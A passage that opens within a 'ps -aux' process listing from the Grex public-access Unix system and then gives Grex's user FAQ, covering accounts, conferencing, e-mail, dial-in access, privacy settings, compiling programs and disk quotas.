IW 18:08 0:01 -tcsh (tcsh) nobody 11899 0.0 0.3 216 664 ? S 18:13 0:01 /usr/local/libexec/httpd root 29405 0.0 0.0 56 60 ? S 16:35 0:06 telnetd ttyue 3com1a94.r krj 25504 0.0 0.0 56 0 q1 IW 16:09 0:01 -csh (csh) jackal 12792 0.0 0.0 40 0 rc TW 18:18 0:00 /bin/sh /usr/local/lib/m roelof 11869 0.0 0.0 264 0 p5 IW 18:13 0:03 -tcsh (tcsh) jackal 12830 0.0 0.0 1104 0 rc TW 18:18 0:00 sort root 8362 0.0 0.0 56 56 ? S 17:44 0:04 telnetd ttyt5 202.56.224 root 10766 0.0 0.0 56 0 ? IW 18:04 0:04 telnetd ttys8 196.3.65.9 nes16 10550 0.0 0.0 68 0 q2 IW 18:03 0:00 -csh (csh) root 7216 0.0 0.0 36 100 ? S 20:57 3:02 tail -f /var/log/ftp.log root 12079 0.0 0.0 56 60 ? S 18:14 0:03 telnetd ttyq6 front0.cpl tlaff 11081 0.0 0.0 40 0 td IW 18:06 0:00 /bin/sh /usr/local/lib/m nobody 10600 0.0 0.3 216 696 ? S 18:03 0:05 /usr/local/libexec/httpd tlaff 11061 0.0 0.0 48 0 td IW 18:06 0:00 /bin/sh /usr/local/bin/m nobody 8285 0.0 0.0 32 0 ? IW Oct 11 0:01 fingerd root 25480 0.0 0.0 56 56 ? S 16:08 0:46 telnetd ttyq1 35.8.1.4 root 11004 0.0 0.0 56 0 ? IW 18:06 0:03 telnetd ttys9 200.16.7.1 nobody 11876 0.0 0.3 216 724 ? S 18:13 0:05 /usr/local/libexec/httpd nes16 10580 0.0 0.0 48 0 q2 IW 18:03 0:00 /bin/sh /usr/local/bin/m abbagirl 2229 0.0 0.0 36 0 u9 IW 17:00 0:01 watch ... cfadm 3791 0.0 0.0 128 0 q1 IW 17:11 0:09 bbs jackal 13078 0.0 0.1 40 212 rc S 18:19 0:01 last archer 4105 0.0 0.0 1180 0 r9 IW 17:13 0:14 pine mauricio 11043 0.0 0.0 68 0 s9 IW 18:06 0:02 -csh (csh) root 10237 0.0 0.0 56 60 ? S 18:01 0:11 telnetd ttyu0 137.224.19 ryan 12439 0.0 0.1 44 268 q5 S 18:16 0:02 /a/r/y/ryan/pfilt/filter thea 10395 0.0 0.0 68 0 u1 IW 18:02 0:01 -csh (csh) mbollman 12350 0.0 0.0 28 0 p7 IW 18:16 0:00 /bin/sh /usr/local/bin/h mbollman 12551 0.0 0.0 40 0 p7 IW 18:17 0:00 more -d /usr/local/grexd root 26165 0.0 0.0 56 60 ? S 16:12 0:18 telnetd ttyr3 165.215.30 jackal 10254 0.0 0.0 68 0 rc IW 18:01 0:01 -csh (csh) joe 13308 0.0 0.5 252 1188 t8 S 18:20 0:00 pine jiffer 26334 0.0 0.0 36 0 r3 IW 16:13 0:02 watch ... root 10244 0.0 0.0 56 60 ? S 18:01 0:10 telnetd ttyrc 206.10.105 shrike 28123 0.0 0.0 272 0 te IW 16:25 0:02 -tcsh (tcsh) jopap 9888 0.0 0.0 68 0 sa IW 17:58 0:02 -csh (csh) menuadm 11948 0.0 0.0 60 88 u0 S 18:13 0:03 talk prime keesan 12650 0.0 0.0 68 0 qe IW 18:17 0:02 -csh (csh) krj 25547 0.0 0.0 36 0 q1 IW 16:09 0:02 watch ... root 3679 0.0 0.0 144 0 ? IW Oct 14 37:59 /usr/local/libexec/sshd greg99 12558 0.0 0.0 156 0 u8 IW 18:17 0:02 -bash (bash) jackal 12829 0.0 0.0 328 0 rc TW 18:18 0:30 ps -aux party 29735 0.0 0.0 80 104 ue S 16:38 0:07 /usr/local/bin/party_ tadeu 16231 0.0 0.0 796 0 ? IW 12:39 0:01 ftpd: 200.249.132.149: t root 13305 0.0 0.1 252 208 ? S 18:20 0:00 sendmail: startup with l root 8487 0.0 0.0 56 0 ? IW 17:45 0:04 telnetd ttyt4 202.60.130 jackal 12987 0.0 0.0 48 0 rc IW 18:19 0:00 /bin/sh /usr/local/bin/m cfadm 12155 0.0 0.0 96 0 qd IW 18:15 0:01 bbs party 11136 0.0 0.1 72 140 td S 18:07 0:02 /usr/local/bin/party_ rjh123 11441 0.0 0.0 428 124 q8 IW 18:09 0:07 pine root 10897 0.0 0.0 56 56 ? S 18:05 0:08 telnetd ttyt1 209.138.42 root 2642 0.0 0.0 56 56 ? S 17:02 0:17 telnetd ttype 161.233.38 vetri 7729 0.0 0.1 80 160 q3 S 17:39 0:03 -csh (csh) party 10050 0.0 0.0 60 104 pe S 17:59 0:04 /usr/local/bin/party_ mikeaa 12286 0.0 0.1 72 156 t1 S 18:16 0:07 /bin/sh ./configure shooter 4464 0.0 0.0 800 0 ? IW 14:53 0:03 ftpd: 212.49.231.161: sh mooncat 11921 0.0 0.0 68 0 t3 IW 18:13 0:01 -csh (csh) cfadm 11016 0.0 0.0 96 0 td IW 18:06 0:01 /usr/local/bin/bbs pfv 10369 0.0 0.1 52 200 u2 S 18:02 0:07 /a/p/f/pfv/bin/pfilt root 16844 0.0 0.0 496 0 ? IW Oct 17 1:23 /usr/local/libexec/sshd mdw 22714 0.0 0.0 76 0 u5 IW Oct 14 0:06 -csh (csh) bebbe346 8506 0.0 0.0 68 0 t4 IW 17:45 0:01 -csh (csh) pinhead 12766 0.0 0.0 796 0 ? IW 18:18 0:02 ftpd: a03169.sp.mandic.c root 29798 0.0 0.0 40 0 ? IW 06:03 0:00 in.ntalkd shrike 2942 0.0 0.0 224 0 te IW 17:05 0:03 elm somesh 11379 0.0 0.0 28 0 s4 IW 18:09 0:00 /bin/sh ./q party 7116 0.0 0.1 60 320 q1 S 17:35 0:07 /usr/local/bin/party_ root 12718 0.0 0.0 56 0 ? IW 12:08 0:35 telnetd ttyq7 edsel.smud root 15158 0.0 0.0 56 0 ? IW 12:30 0:43 telnetd ttyq0 inet.bdsi. root 11000 0.0 0.2 56 436 ? S 18:06 0:05 telnetd ttytd 128.196.22 thea 10435 0.0 0.0 48 0 u1 IW 18:02 0:00 /bin/sh /usr/local/bin/m root 134 0.0 0.0 56 0 ? IW 16:40 0:49 telnetd ttypa 129.115.11 sys 10314 0.0 0.0 36 44 ? I 11:54 0:09 in.identd -w -t300 -l ryan 12424 0.0 0.1 36 152 q5 S 18:16 0:00 /a/r/y/ryan/watch ... root 2470 0.0 0.0 68 0 u5 TW Oct 17 0:02 -sh (csh) sys 26321 0.0 0.0 48 0 ? IW Oct 11 0:00 in.identd -w -t300 -l mikeaa 10916 0.0 0.0 156 0 t1 IW 18:05 0:03 -bash (bash) root 26487 0.0 0.0 56 60 ? S 19:26 1:47 inetd neya 15160 0.0 0.0 72 0 q0 IW 12:30 0:06 -csh (csh) root 120 0.0 0.0 56 56 ? R 16:40 40:18 telnetd ttyr2 147.225.19 krj 25545 0.0 0.0 36 0 q1 IW 16:09 0:03 watch ... root 13219 0.0 0.2 56 432 ? S 18:20 0:01 telnetd ttys3 24.112.155 sj2 8398 0.0 0.0 144 0 t5 IW 17:45 0:01 -bash (bash) keesan 12720 0.0 0.0 48 60 qe S 18:18 0:00 mail wlevak nes16 10616 0.0 0.0 448 0 q2 IW 18:03 0:02 pine root 10058 0.0 0.0 56 0 ? IW 17:59 0:02 telnetd ttyqb 24.30.48.8 nats 12725 0.0 0.0 68 0 q7 IW 12:08 0:05 -csh (csh) abbagirl 2171 0.0 0.0 64 0 u9 IW 16:59 0:02 -csh (csh) party 26762 0.0 0.1 80 208 r3 S 16:16 0:11 /usr/local/bin/party_ party 12225 0.0 0.1 72 180 qd S 18:15 0:01 /usr/local/bin/party_ root 10287 0.0 0.0 56 60 ? S 18:01 0:10 telnetd ttyu2 216.93.16. ryan 12318 0.0 0.0 68 0 q5 IW 18:16 0:01 -csh (csh) root 12644 0.0 0.0 56 60 ? S 18:17 0:07 telnetd ttyqe 204.212.46 jopap 13073 0.0 0.4 552 876 sa S 18:19 0:01 pico.real -z all root 13324 0.0 0.1 124 264 r0 S 18:21 0:00 login -h 204.212.46.132 menuadm 11776 0.0 0.0 60 96 pc S 18:12 0:02 talk saloon wasf 12131 0.0 0.0 48 0 q6 IW 18:15 0:00 /bin/sh /usr/local/bin/m root 9139 0.0 0.3 480 668 ? S 17:51 0:17 sendmail: HAA21168 hcldl wasf 12185 0.0 0.3 460 620 q6 S 18:15 0:03 pine pfv 10360 0.0 0.0 192 0 u2 IW 18:02 0:01 tcsh -c ~pfv/bin/pfilt party 12426 0.0 0.1 80 336 q5 S 18:16 0:01 eggdrop root 10736 0.0 0.0 396 0 ? IW 18:04 0:10 sendmail: FAA18438 rings greg99 12719 0.0 0.0 348 0 u8 IW 18:18 0:01 lynx party 10347 0.0 0.0 80 112 u2 S 18:01 0:04 /usr/local/bin/party_ #p root 13154 0.0 0.0 120 0 sb IW 18:20 0:00 login -h 63.23.174.219 - root 11357 0.0 0.0 56 60 ? IW 18:09 0:07 telnetd ttyq8 207.91.203 root 13276 0.0 0.0 92 188 ? IW 18:20 0:00 mail -r reenaf@hotmail.c root 7217 0.0 0.0 96 104 ? IW 20:57 0:06 egrep USER|STOR|RETR|LIS nobody 11759 0.0 0.3 216 680 ? S 18:12 0:01 /usr/local/libexec/httpd root 11668 0.0 0.0 56 0 ? IW 18:11 0:01 telnetd ttyp7 152.171.23 root 0 0.0 0.0 0 0 ? D Oct 10154:26 swapper mystar 12365 0.0 0.1 504 340 tf S 18:16 0:05 lynx sports.yahoo.com joe 13217 0.0 0.0 68 0 t8 IW 18:20 0:01 -csh (csh) nobody 11761 0.0 0.3 216 708 ? S 18:12 0:03 /usr/local/libexec/httpd > faq Frequently Asked Questions About Grex General * What is Grex? Grex is a public-access computer conferencing system in Ann Arbor, Michigan, USA. It is cooperatively owned and operated, and is supported entirely by donations from users. All staff members are volunteers. * What does the name "Grex" mean? Grex is not an acronym. It is a Latin word meaning "flock". It is the root of a number of familiar English words such as aggregate, congregate, and gregarious. * What can I do on this system? Grex provides all of the following services for free. o Electronic conferencing using "PicoSpan" or "Backtalk" o Internet e-mail using "mail", "elm", "pine" or "mh" o Browse the web in text mode using "lynx" o Access to usenet via "lynx" to the dejanews web site o Multichannel real-time chat using "party" o Free text-only web site hosting. o On-line games, including "Nethack" o Access to a Unix shell account, with all standard commands o Access to the C/C++ compiler, assembler, and other development tools However, Grex does not provide any of the following services at all: o Download areas o Mailing lists o Bots (for IRC or anything else) o Graphical web page hosting o A place to store files And there are a few things you can only do if you are a member (who has made a donation and sent ID). These are o Vote in Grex elections. o Serve on the board of Cyberspace Communications. o Access telnet, ftp, and irc sites from Grex. o Access web sites running on unusual ports, via lynx from Grex. * What operating system is Grex running? Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not Linux, but it is Unix, so in many ways it is similar to Linux. There are a lot of details about Grex's configuration available in the Grex staff notes on the web. http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and software. ---------------------------------------------------------------------------- Conferencing * What is "computer conferencing?" A computer conference is an area set aside for discussion on some general topic, such as computers, politics, or gardening. In such an area, people can read what other people have posted, and can introduce new subtopics or add responses to existing ones. On many systems, conferences are called "forums". Grex has many conferences. For a complete list, see http://cyberspace.org/cgi-bin/bt/pistachio/conflist. * How can I participate in Grex's conferences? Grex's conferences are accessible by a text-based terminal interface or by the World Wide Web. To access the text-based interface, either dial direct or telnet to Grex and run the "bbs" command. (This command is run automatically every time you log in if you choose the "bbs shell" when you create your account.) World Wide Web access is provided by Grex's "Backtalk" conferencing software. Please see http://cyberspace.org/backtalk.html for details on using Backtalk. ---------------------------------------------------------------------------- Governance * How is Grex governed? Cyberspace Communications functions as an online democracy, with policies set by its users. The Co-op Conference is open to all users and provides a forum for discussing policy issues. The Board of Directors, elected by the members, is the formal governing body and uses consensus in the Co-op Conference as its primary guide for making decisions. Any member of Grex who can attend the monthly meetings, held in Ann Arbor, Michigan, is eligible to run for the Board of Directors. In addition, any member can call a binding vote by the membership on any policy issue. The Articles of Incorporation and Bylaws can be viewed online. * How can I participate in Grex governance? Any user can have a voice in Grex governance by joining the Co-op conference and participating in the discussions there. If you wish to be eligible to vote in Grex elections and to run for the Board of Directors, you can become a Grex member. Membership dues are US$6/month or US$60/year. To find out how to make membership payments, please see http://cyberspace.org/member.html. Membership donations are Grex's primary source of financing. * Can I pay for membership by credit card? Unfortunately, no. Grex has investigated the possibility of accepting memberships by credit card, but the setup cost and monthly charges that we would have to pay to the bank are too high for us to pay. We do accept personal checks in US funds drawn on a US bank, US currency (not recommended to send by mail), and international money orders. ---------------------------------------------------------------------------- How do I ... ? * How do I change my name, my shell, my mail forwarding, my password, or my terminal type? You can change any of these properties of your account with the "change" command. If you are using a menu or if you are at a bbs (Ok) prompt, type "!change" If you are in lynx, type "!" (an exclamation point) to get to a shell prompt first. At a shell prompt, type "change" and follow the menu-based instructions. * How do I change my login ID? You can't change it. Instead, you have to create a new account with the login ID that you wish. Once you have done that, you can copy the files that you need from your old account to your new one. When you no longer need your old account, you can ask to have it deleted by sending a request from your old account to staff@cyberspace.org. * How do I set up a web page? There is a completely separate FAQ for all questions related to the Grex web server. Please see http://www.cyberspace.org/local/grex/wwwfaq.html. * How do I run irc? Unless you are a paying member, you can't use IRC because the protocol is blocked for free accounts. For more detailed information about this, see the Grex Eggdrop Page from the Grex Staff Notes. If you are a guest user, you cannot access IRC. You can chat on-line within the Grex community by using "party" (see chatting, below). Paying members just need to type "irc" to run the ircii client program, which is installed for this purpose. * How do I chat with others? Grex has six ways of chatting: o 'party' is a chat program that many people can run at once. o 'write' sends text to the other person's screen one line at a time. o 'chat' is like 'write' but it sends one character at a time. o 'tel' is like 'write' but it sends only one line and then stops. o 'talk' splits the screen in half, so both people can type at once. o 'ytalk' is like talk but can accommodate more than two people. * How do I find out who is waiting to log in? You can't find which accounts are waiting. People don't log in until after they get out of the telnet queue, so the system doesn't actually know who the people in the queue are. You can get some amount of information about who is in the queue. The command: fixwait -l will give you a list of the IP addresses that people on Grex are coming from, including people in the queue. If your friend has a unique IP address, you may be able to recognize it in the list. * How do I get out of vi? vi (pronounced vee-eye) is a powerful text editor, but it has a steep learning curve at first. You can usually tell that you are in vi when you have a vertical line of squiggles (tildes) on the left of your screen. If you are trapped in vi, remember to type the escape key and then :q! (colon-q-exclamation point) followed by a return. The pico editor is a much friendlier editor for less experienced users. * How do I access Usenet news? Grex does not maintain its own base of Usenet news, because this requires too much space and too much of our internet link. So there is no usenet client program on Grex. However, you can access Usenet via the "lynx" web browser. Just connect to http://dejanews.com/. * How do I run X-windows? Grex does not support graphical interfaces such as X-windows. This service requires many more resources than the text-based service that Grex provides. It would use far too much CPU time and bandwidth for Grex to be able to support it. * How do I restore a lost file from a backup tape? We can't do that. We just don't have time. Grex makes regular backups onto tape, but this is an enormously time consuming process. The purpose of these backup tapes is to protect the system from disaster. Unfortunately, there is not enough time to honor requests from individual users to restore files from these tapes. Grex is not a good place to keep any file that you cannot afford to lose. If you have an important file on Grex, it is your responsibility to keep a backup of it on your own computer. * How do I get a list of Unix commands? There are so many Unix commands that we recommend that users who are not familiar with Unix use the "menu" command to explore Grex. The most common commands are available there. If you really want a list, then run the Grex command "listcommands" to print a list of most Unix commands on Grex. (Built-in shell commands are not included). This will take a long time to run. * How do I use Unix commands? The Unix operating system is amazingly powerful and flexible, with thousands of commands. Unix can be a challenge to get started with, but if you are interested in learning Unix, Grex is a good place to start, since we do give you access to almost all commands. For a good introduction to basic Unix and VI usage, see Christopher Taylor's witty tutorial Unix is a Four Letter Word, or the University of Edinburgh's UNIXhelp for Users pages. Jennifer Myers has a good page of Unix links at the UNIX Reference Desk. Online reference information about most commands can be called up via the "man" command. For example, for information about the date command, type man date ---------------------------------------------------------------------------- Accounts and Passwords * Why do numbers appear before the login prompt? If you are telnetting to Grex when it is full, you must wait in a queue for a free port to telnet into. These numbers are telling you your place in line. There usually is no queue in the evenings in the eastern US and on weekends. * Why do I get a login prompt after I log out? This is in case there is a queue. it permits you to log in without waiting through the queue a second time. It is safe to disconnect when you are at the login prompt, or you can type "bye" or "exit" and Grex will disconnect. * Why does it say my new password is too obvious? Probably because it is too short, or only has lower case letters. It is important that internet vandals not be able to guess your password. Therefore, the Grex password change program is very particular about what it will accept. It is a good idea for your password to have at least 9 characters, at least one of which is an upper case letter, and at least one number or punctuation character embedded in it. Try the "genpass" program for some random passwords. * Why does it say my password is expiring? For security reasons, you should not keep the same password for too long. Grex passwords expire when they have not been changed for a whole year. All you have to do is run the "change" program to change your password, and you will stop getting nagged when you log in. Please remember to write your new password down when you change it, so you won't forget it. * Grex said, "3 failures since last login," when I logged in. What does this mean? When someone tries to log in to your account but does not know the password, Grex keeps count of failed login attempts. In general if there are only two or three of them, it probably means someone made a typo at the login prompt. This happens most often for accounts with very short user IDs and those with popular names, such as "ken". Less commonly, login failures may occur when someone runs telnet with the option to pass along the account name from another system. If it is a different account name, but matches yours, this will produce a failed login attempt for your account every time this person telnets to Grex. If there are 25 or 30 failed login attempts, or if the last successful login to your account wasn't yours, then it could mean that someone is trying to break in to your account. In general, most failed login attempts are from other people's typing errors and are not malicious. If you still suspect malicious activity, change your password (don't forget to write it down) and let the staff know so that they can investigate. * I can't remember my password. What do I do? Contact the Grex staff. Send mail from another site if you have access to email at another site. Send messages about access problems to staff@cyberspace.org. Remember to specify which account is the one you lost the password for. You can also log in to Grex as "trouble" without a password, which will send a message to the staff. Be sure to provide a postal address, an e-mail address, or a local telephone number, so that the staff can contact you in return. * I have a Grex account. Why do I get "No such loginid?" This means that your account has been deleted. Accounts on Grex are deleted if no one logs in for more than 3 months. There is not enough room on Grex to keep old unused accounts. To avoid losing your account, you should log in every month or two. Accessing your web page, or having your mail get forwarded does not count, but conferencing over the web using your account and password in Backtalk does count as logging in for this purpose. If your account has been deleted, it usually cannot be recovered or restored. Please feel free to recreate the account. * I don't want to use my account anymore. How do I get it deleted? If you don't want to wait until your account expires, you have to log in one last time and send a message to staff@cyberspace.org from the account that you want deleted. In your message, ask for it to be deleted. * Why can't I enter control-C when I am creating my account? When creating an account by telnet, you are asked to provide the characters you wish to use for various purposes. People using Macintosh NCSA Telnet have experienced the behavior that when they type ^C, the program exits rather than accepting the ^C as the designated control character. This is caused by undesirable preferences within that program and is easy to fix. Look at the "Session" menu, at the "Setup Keys" menu item (or hit command-S). You will probably find that you have a setting for "interrupt process" which is set to ^C. If so, NCSA Telnet is honoring this setting and sending the "interrupt process" signal (part of the time-worn telnet protocol) whenever you type ^C. Blank this setting out and then save your telnet set in a file. If you start telnetting by double clicking on the saved settings, you won't have to remember to clear it each time. ---------------------------------------------------------------------------- E-Mail * How do I get Grex to forward my mail to another site? Use the "change" command. Just type "change" at a shell prompt or "!change" at any other prompt. This will invoke a menu that allows you to change almost any setting on your account, including the mail forwarding option. There are certain restrictions on the use of forwarding, so make sure you are following the rules.. * I set up .forward myself. Why doesn't it work? Probably because it is not world readable. .forward files must be world readable in order to be valid on Grex. If you are looking for a way to forward your mail to an anonymous place, you need to find an anonymous remailer system. Grex doesn't do this. To make your .forward file world readable, change to your home directory (type: cd) and then issue this command: chmod 644 .forward Your home directory must also be world accessible; type: chmod 755 . or use 711 instead of 755 if you don't want other people to be able to scan your directory. * How can I hide my forwarding address? You can't. If you have forwarding enabled, the address must appear in the finger command. There is no way to hide the address that you are forwarding to. Grex does not wish to provide anonymous remailing services. You may wish to make use of one of the anonymous remailers listed on the Yahoo page http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_ Mailers/. * How do I read mail with Netscape or Eudora? You can't. Those are POP clients, and Grex doesn't run a POP server. This is because Grex is intended to be an on-line community, and having a POP server would encourage people to use Grex as a mail drop instead, never logging on, and so never having a chance to become part of the Grex community. You must log in to Grex in order to read your mail. * My mailbox is getting heavily spammed. What can I do? Spam (unwanted mail) is unfortunately very common on the internet. Grex's mail transport system has numerous filters to reduce spam, but it does not eliminate it. The Grex staff may or may not be able to help you reduce the spam you are getting. The proper way to report spam is to forward a copy of one of the offending messages to abuse@cyberspace.org. Do not send multiple messages. The message you send MUST be accompanied by the full mail headers, so that we can determine its true origin. The origin of spam is often hidden, and may require detailed examination of these headers. If you use pine, you can view these headers with the "H" command. * Why is mail that I send to Grex getting rejected? This usually happens when the sending site is not configured properly. Problems in mail configuration can often lead to mail that has an invalid return address. Grex's mail system tries very hard to detect and reject invalid sending addresses, in order to reduce the amount of spam (unwanted mail) on Grex. If your mail looks like spam, then Grex will reject it. If you think this is happening to your legitimate mail, send a rejected copy of it to grex-staff@pmtech.com, and be sure to include all of the mail headers. Other common reasons for mail to Grex to be rejected are that it may be too large ( over 100k) or your mailbox may have grown too large (over 600k). Mail will be rejected in these cases. * Why does pine say that it cannot open my mail folder? Actually, that is probably just a faulty error message. For new accounts, it only means that you haven't received any mail yet. Once you receive some mail, the message should go away forever. We are working on getting rid of this error message. * How do I get pine to save my outgoing mail? This feature is turned off on Grex by default, because lots of new users were accumulating vast files of old mail without ever knowing that they were doing it. You're quite welcome to create the folder, as long as you keep an eye on your disk usage so that you don't exceed Grex's 1 megabyte limit for your account. To create your saved-mail folder, go into the pine configuration screen and look for the setting for "default-fcc". Set it to "saved-mail" or whatever name you would like to use. You need to use quotation marks around the file name. * How do I send attachments? Please do not send large attachments. If you have a small one, so that your mail remains under 100 K bytes in size, then you can send attachments from Grex. Once the file is in your home directory on Grex, then when composing a message in pine, put the file name on the attachments line. Please remember to delete the file after sending it as an attachment, so that you do not fill up your allotted disk space. * How can I view an attachment file named myfile.doc? Any file that ends with ".doc" is probably a Microsoft Word file. There is no way to view such a file on Grex. You will have to download that file to a computer that has Microsoft Word or some other word processor that can import such files. * How can I set the "From" header in pine for my outgoing mail? In Pine on Grex, you can't set the "From:" field. This is disabled because there were too many problems with people setting invalid addresses, which caused their outgoing mail to bounce to the postmaster whenever it was undeliverable. * How do I set up a mailing list here? You can't. We're sorry, but this is not permitted. You can only forward mail to a single site elsewhere on the internet. Mailing lists are too resource intensive for Grex to support. You may wish to try using an advertising-based free mailing list service. The Free Center maintains a rated list of free mailing list providers. * Is it OK to collect my mail by FTP? Yes, but you must do it correctly. It is a extremely risky to attempt to transfer your mail spool file directly off of Grex by FTP. You risk losing some or all of your collected mail, because the FTP daemon does not participate in the locking scheme used by the mail delivery programs on Grex. In addition, your account may appear to be abandoned because FTP connections do not update the date of last login. This could result in loss of your account if it is the only way you use Grex. Instead, we recommend telnetting to Grex and running a mail client program. These all do participate in the locking mechanism for the mail spool. Collect all of your mail into a file in your home directory, and then log out. You may now safely fetch that file in your home directory by FTP. Please remember to delete it once it has been safely transferred. * Why can't I get procmail to work? Procmail is a mail filtering program, but it stopped working when Grex reorganized its mail system to use hierarchical mail directories. Grex really needs to have the mail organized hierarchically because of the very large number of users receiving mail. We hope to see procmail restored some day, but at the moment it is broken, and no schedule has been established for correcting it. * Can I set up an autoresponder to answer my mail while I am away for a while? Yes. Try the vacation program. The instructions can be found by typing "man vacation". ---------------------------------------------------------------------------- Dialing In * How can I dial into Grex? The short answer is to dial (734) 761-3000 with your terminal software set to 8-N-1. This process is described in detail in Grex's dial-up access information page. * If Grex doesn't answer the phone, how many times should I let it ring? We try very hard to keep all of the modems working properly, but sometimes, you may encounter a failure. Grex's phone lines are all configured so that if one modem doesn't answer after 3 rings, you are automatically transferred to the next line in the trunk hunt. If there happens to be a stuck modem, you need to wait at least 4 rings before a second one gets a chance to work. If there are two bad modems, then 7 rings are required. * If I can't get on by calling (734) 761-3000, is there another number I can try? No. Grex used to publicize other numbers in the interior of the hunt group, but there is no longer any advantage to calling any other number, because of this automatic stepping feature. Even if Grex is down, the phone should pick up once it steps past any bad modems. If it is down for an extended period, you should receive a short explanation from the terminal server. If the terminal server has failed, or the power to Grex's building has failed, the phones will not answer, but these conditions are very rare. * Why can't I get file transfer to work except for small files? Probably because you don't have a modem cable that is capable of handling hardware flow control, or your modem doesn't support it or has the feature turned off. ---------------------------------------------------------------------------- Privacy, Encryption, and Security * My personal information should be private. Why is it shown? When you look up your own user information, you can always see it, even if it is set up so that nobody else on the system can see it. To see what other people see, ask for the info about "youraccount@cyberspace.org" instead of just "youraccount". * How can I keep private the place I'm logged on from? This is considered public information on Grex. The only way to hide it is not to log on. * I am receiving unwanted chat requests. What can I do? You can adjust the chat settings for your account with the "change" command. To run it, type "change" at a shell prompt, or "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and follow the menus from there. You can: turn off all chat requests, accept all chat requests, or select which users can and cannot chat with you. * How can I view my friend's files? Grex is a very open system, so directories are open to the public unless the owner decides to make them private. E-mail, however, is automatically saved in private files that the world cannot see. To permit a file so that it can be seen by others, type chmod a+r file-name To permit a directory, type chmod a+rx dir-name To hide a file or directory, type chmod ou-rx file-or-dir-name If you hide your home directory completely, neither mail forwarding nor web hosting will be available to you. You may make your directory accessible without being allowing it to be scanned. This is how: chmod 711 dir-name * Can I run PGP on Grex to protect my e-mail messages from being seen by others? No. PGP is not available on Grex for a number of reasons. The two most compelling reasons are that it would not be legal, and it would not offer you the protection you seek. We would like to see it be legally available to all, but in order to be effective, PGP must be installed on your own computer, not on Grex. Encrypting or decrypting a message on Grex would mean that the message would have to travel over an insecure network in plaintext before encryption or after decryption, and this is not the way to protect your message. In order to install PGP on your home computer, North American users should go to the MIT PGP Distribution Site at http://web.mit.edu/network/pgp.html, and all other users should use the international PGP home page at http://www.ifi.uio.no/pgp/. * Do you provide secure shell? Yes, we do. Secure shell (ssh) is a good way to connect because your session is encrypted, so that passwords cannot be intercepted by sniffers. Unfortunately, it is not fully functional on Grex, because the ssh daemon is unable to wait in line with telnet users when there is a queue, so ssh connections will fail when the system is full. You may see a message like this when it fails: Warning: no access to tty (Bad file number). When there is no queue you can use ssh to connect to Grex without any trouble.. ---------------------------------------------------------------------------- Programming * How do I compile a program? To compile a C program named foo.c, type gcc foo.c -o foo. This compiles foo.c and creates an executable program named foo. To run it, type ./foo Likewise, to compile a C++ program named foo.cpp, type g++ foo.cpp -o foo Please check with the Grex staff before compiling programs you bring in from the net. Most of the useful programs are already installed here, and many others will not run on Grex, but compiling them on Grex wastes a lot of bandwidth and cpu time — resources that Grex is short on. * Why can't I get the C compiler to compile my program? Probably you are using the wrong C compiler. Grex has two compilers installed. cc is only used for building certain system executables. It is not ANSI standard, and it lacks certain standard include files. You need to use gcc instead. This is a fairly recent version of the Gnu C compiler. It is ANSI standard and very complete. * I compiled my program. Why won't the system run it? Usually this is because the program is not on your path. Unlike a DOS or Windows system, on Unix the current directory is not automatically placed on your path. So if you compile a program named foo, you cannot run it by just typing "foo". You need either to place the executable somewhere on your path, or to precede its name with ./ (dot-slash) so you would type "./foo". * Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo? No. These are all servers, daemons, or programs that remain running after you have logged out. No program run by users is allowed to run after you log out. See the Grex Eggdrop Page from the Grex Staff Notes. At one time or another, the possibility of our installing some of these as official services has been discussed in the "coop" conference. We have never yet decided to do so, but if you are interested in pursuing this possibility, the Grex coop conference is the place to make your request. * Can I have a copy of Grex's newuser program? Yes, you can find out more about newuser, including availability, on this web page: http://www.cyberspace.org/~mdw/newuser.html. * Can I have a copy of Grex's write/chat/tel programs? Yes, you can find out more about write/chat/tel, including availability, on this web page: http://www.wwnet.net/~janc/write.html. * Can I have a copy of Grex's party program? Yes, you can find out more about party, including availability, on this web page: http://www.wwnet.net/~janc/software.html. ---------------------------------------------------------------------------- Miscellaneous * Why does my browser say "Can't find application" when I click on the "Telnet In" link? You need to configure your browser to find your telnet application program. The exact instructions for doing this vary widely depending upon both your operating system and your browser. In Netscape 3 this setting can be found in "Options"/"General preferences"/"Applications". Select the telnet application that came with your system, or one you downloaded from the internet. For more details about telnet applications, see the Grex Telnet Information page at http://www.cyberspace.org/telnet.html. * When I try to telnet to Grex, it hangs. Why can't I connect? There are several things that can go wrong. o You don't have DNS working properly. In this case you can connect to Grex by using its IP address. See below. o You are accessing the net via a firewall which blocks telnet. In this case you need to contact your security administrator for the LAN which you are accessing the net from, and ask if there is a way to telnet through the firewall. o Your telnet client is not working properly. You would not be able to telnet to any other site, either. Have you tried any? Try telnetting to hvcn.org and see if you get a login prompt. o Grex is down. This happens occasionally. You can usually tell if Grex is down by trying to access the web site. Try reloading to eliminate the possibility of a cached page. This won't be a good test if your connection uses a caching proxy server. o If it is none of the above, send mail to The Grex Staff and explain everything you tried, and also please specify the IP address and the GMT time that your attempt failed. If you can provide the results of a ping or traceroute from your end, that may prove to be helpful, too. * Can I do a ping or traceroute from Grex? These tools are not available on Grex. Vandals were using them to attack other sites. This is a ludicrous thing to do from Grex, because Grex is so tiny that its CPU and net connection become overloaded long before any other system would even begin to notice that it was being attacked. But people were doing it anyway, and hurting Grex. Regrettably, the actions of a few thoughtless people has forced Grex to disable these potentially valuable network analysis tools. You may be able to use a remote traceroute server on the web. See http://www.traceroute.org/. * What is Grex's IP address? At the time this answer was last updated, the IP address of Grex was 204.212.46.130, IP addresses may change at any time. In general we have little control over changes to our IP address. You should always use the hostname, because if the IP address does change, the DNS (Domain/Name Service) lookup of the hostname should produce the new IP address. If you unsure if a problem is due to DNS, you can test to see if you can connect using our IP address. However, if you can, it is strongly recommended that you resolve the problem you are having with DNS, so that you do not have to rely on inherently unreliable IP addresses. * Why does the "who" command show numeric IP addresses for some users? That is because this information is stored in a file (utmp) which only permits 16 characters of storage for this information. If the IP address exceeds 16 characters when converted to text form, then it is stored (and reported) only in its numeric form. This affects other commands besides the "who" command, such as the "finger" and "last" commands. * How much disk space can I use and how can I determine how much I am using? We ask folks to keep their disk usage under a megabyte. You can find out how much disk space you are using (in kilobytes) by running the following command in your home directory: du -sk The number that comes back is the number of kilobytes of disk you are using. If you are using more than 1024, please remove files. If you are thinking of putting something big in your account, please talk to the Grex staff 